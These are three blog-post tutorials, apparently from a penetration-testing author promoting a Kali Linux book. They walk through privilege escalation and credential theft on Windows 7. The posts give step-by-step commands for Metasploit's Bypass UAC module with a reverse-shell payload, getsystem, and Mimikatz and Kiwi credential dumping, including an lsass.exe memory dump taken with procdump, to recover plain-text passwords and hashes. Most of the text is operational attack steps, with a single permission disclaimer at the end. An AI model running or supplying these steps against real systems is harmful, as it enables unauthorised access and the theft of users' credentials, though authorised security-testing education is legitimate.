System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

Its been a while since I have used Metasploit’s Bypass UAC module and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple, the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

BypassUAC Metasploit 1

From here, enter:

  • use exploit/windows/local/bypassuac_injection
  • set session 1
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [Kali’s IP Address]
  • set lport 4545 (Important: use a different port from one used for original shell)
  • exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

BypassUAC Metasploit 2

Now if we type “getsystem” it should work, as verified by “getuid”:

BypassUAC Metasploit 3

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type, “load kiwi“:

BypassUAC Mimikatz 4

Then type, “creds_all“:

BypassUAC Mimikatz 5

Oh look, user “Dan” is using the hyper secure password of “password” – Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC that you select a different port number for it to use or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Lastly, once we had the second shell created by Bypass UAC, we quickly elevated our privileges to system level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux” – Also a follow up book is coming out very soon!

Grabbing Passwords from Memory using Procdump and Mimikatz

When I was working on my Pulling Remote Word Documents from RAM using Kali Linux article, I was curious if you could use the same technique to pull the system passwords, and you can…

With the help of Mimikatz!

I tried grabbing the lsass.exe process with procdump, just like I did in the previous article, but when I ran strings I didn’t see any passwords. Well, silly me, you wouldn’t! But as the Zena Forensics blog explains, just take the lsass.exe procdump and run Mimikatz on it!

(Sorry Gentilkiwi, you would think I would know better!  🙂 )

Okay, so once we have the procdump of the lsass.exe process saved as lsassdump.dmp like so:

lsass prodump

All we need to do is run the resultant .dmp file through Mimikatz:

  • Run Mimikatz
  • Type, “sekurlsa::Minidump lsassdump.dmp
  • Lastly type, “sekurlsa::logonPasswords

And that is it! Mimikatz works it’s magic on the dmp file and within a second or so we see this:


Passwords! Wow, this is a really secure Windows 7 system I see…

So if we can get a memory dump of the lsass.exe process (you need to have an administrator level account to do so) we can take our time and pop the passwords out of it at any time (and anywhere) with Mimikatz.

For more information, check out my latest book, “Basic Security Testing with Kali Linux, 3rd Edition” which has a complete chapter on using Mimikatz!


Recovering Plain Text Passwords with Metasploit and Mimikatz

I haven’t been posting as much recently as I have been hard at work writing a new book on basic security testing with Kali Linux and other open source security tools. The bad thing is it is taking up about all of my free time now. The good thing is that I am going over a lot of exceptional material that I don’t think I have posted here before.

So today I decided to post a sneak peak at what type of material will be in the book.

Mimikatz, created by our friend Gentil Kiwi, is a great password recovery tool. It is able to recovery passwords from several Windows processes in PLAIN TEXT.

Not to long ago a Mimikatz module was added to Metasploit, so recovering clear text passwords once you have a remote meterpreter shell is easier than ever.

So let’s check it out!

Clear Text Passwords with Mimikatz

We will start out with a post exploit scenario. Using Metasploit we already ran a successful exploit and now have an active remote meterpreter session.

Luckily our target user was using an administrator account and we used the Bypass UAC module to bump our access up to System level. (Explained in the book)

Now we just need to load in the mimikatz module. There is a 32 and 64 bit module, choose accordingly. For this demo we will be using the 32 bit.

Mimikatz 1

  1. At the Meterpreter prompt, type “load mimikatz”.
  2. We will now have a mimikatz prompt. Type “help” for a list of available commands:

Mimikatz 2

The help is pretty self-explanatory; basically type the corresponding command to the creds that you want to recover. So for Kerberos just type “kerberos” at the Meterpreter prompt. Or type “msv” to recover the hashes.

Using these commands you can recover user passwords from multiple system sources – Windows Login passwords, MS Live passwords, terminal server passwords, etc.

You can also use the “mimikatz_command” command to perform even more functions like retrieving stored certificates.

But for today we are just interested in passwords.

Recovering Hashes and Plain Text Passwords

  1. Type “msv”.

Mimikatz 3

And there you go – a list of the password hashes. Well, we could grab the hash and try to crack it, or run it through an online rainbow table, but what if we don’t have that kind of time?

It would be nice just to get the password in plain text.

Well… You can.

  1. Type “Kerberos”.

Mimikatz 4

If you look at our user Ralf, you will see his password in plain text!

And that is it, after we get a remote session with Metasploit and using Mimikatz, recovering clear text passwords is just a few commands away.

(As always do not try these techniques on networks that you do not own or do not have permission to do so. Doing so could get you into serious trouble and you could end up in jail.)